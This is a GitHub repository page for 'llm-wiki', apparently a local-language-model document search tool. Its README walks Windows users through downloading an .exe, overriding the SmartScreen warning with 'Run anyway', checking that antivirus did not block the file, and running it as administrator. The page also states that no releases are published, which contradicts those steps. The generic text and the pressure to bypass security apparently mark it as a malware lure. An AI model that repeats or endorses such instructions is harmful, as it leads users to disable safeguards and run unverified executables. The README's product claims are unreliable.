Skip to content

howdow698-ui/llm-wiki

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

🧠 llm-wiki - Access knowledge using local language models

llm-wiki brings the power of artificial intelligence to your personal computer. This software allows you to search, summarize, and organize information using local language models. It runs entirely on your hardware. You do not need an internet connection to process your files once the software loads. This tool helps you manage large amounts of text data without sending your private information to external servers.

📥 Getting Started

Follow these steps to set up llm-wiki on your Windows computer.

  1. Go to the official release page.
  2. Look for the latest release version at the top of the list.
  3. Click the file ending in .exe to start the download.
  4. Save the file to your desktop or downloads folder.

Ensure you have at least 8GB of free space on your hard drive before you begin. You also need a computer with at least 8GB of RAM to handle the language models effectively.

⚙️ Installation Process

Windows may display a warning because this is a new application. Follow these instructions to proceed:

  1. Double-click the file you downloaded.
  2. If a blue box appears, click "More info."
  3. Click "Run anyway."
  4. Follow the prompts in the installation window.
  5. Choose a destination folder for the program files.
  6. Click "Install" and wait for the process to finish.

The setup utility automatically creates a shortcut on your desktop. You can launch the program from this icon at any time.

🚀 Running the Software

The first time you open llm-wiki, the program performs a configuration check. It verifies your available hardware.

  1. Launch the application from the desktop shortcut.
  2. Wait for the initial loading screen.
  3. Select an AI model from the drop-down menu. The software suggests a model based on your system power.
  4. Click the "Load" button. The download of the engine starts automatically.
  5. Once the bar reaches 100%, you are ready to start.

🔍 How to Use llm-wiki

The main interface features a text box and a file upload area. You interact with the software using plain English commands.

Uploading Documents

You can load text files or PDFs to analyze their content. Click the "Add Files" button and select the documents from your computer. The software processes these files and stores them in a local index. This index allows the AI to recall information quickly.

Asking Questions

Type your request into the question box. For example, you might ask: "Summarize the key points in these documents" or "What does the text say about history?" The software searches your uploaded documents and provides an answer based only on that information.

Adjusting Settings

You can change the behavior of the AI in the settings menu.

  • Temperature: Lower numbers make the AI focus on facts. Higher numbers make the AI more creative.
  • Context Size: This controls how much text the AI reads at one time. If you work with large books, increase this number.

📈 System Requirements

Your computer needs specific hardware to run llm-wiki smoothly.

  • Operating System: Windows 10 or Windows 11.
  • Processor: Intel Core i5 or AMD Ryzen 5 series or better.
  • Memory: 8GB of RAM is the minimum. 16GB is recommended.
  • Graphics: A dedicated graphics card with at least 4GB of video memory improves performance significantly.
  • Storage: 10GB of free space for the application and the models.

If the software runs slowly, close other programs that use significant memory, such as web browsers or photo editors.

🛠 Troubleshooting

Most issues arise from file permissions or memory limits.

If the application fails to open:

  1. Restart your computer.
  2. Check that your antivirus program did not block the executable file.
  3. Reinstall the program using the "Run as Administrator" option.

If the AI stops responding:

  1. Clear the current session by clicking "Reset" in the menu.
  2. Select a smaller AI model. Smaller models require less memory and run on most computers without issues.

📝 Frequently Asked Questions

Does this software send my data to the internet? No. All processing happens locally on your computer. Your files stay on your hard drive.

Can I use this without a graphics card? Yes, but the responses take more time to generate. The processor handles the math if no graphics card is available.

How do I update the software? The application checks for updates automatically when you launch it. If a new version exists, the software prompts you to download and install it.

📁 Project Structure

The software organizes files into distinct folders to ensure performance:

  • Data: Stores your indexed documents.
  • Models: Contains the downloaded AI engine files.
  • Logs: Keeps small text files that record errors if the program fails. This helps you identify what went wrong if the software stops.

You do not need to modify these folders. The program manages all file operations on its own.

🔗 Resources

For additional guidance, visit the official repository. The repository provides technical documentation for power users who want to modify the source code or contribute to the project features. Always check the README.md in the repository for the most current information regarding updates and changes.

Releases

No releases published

Packages

 
 
 

Contributors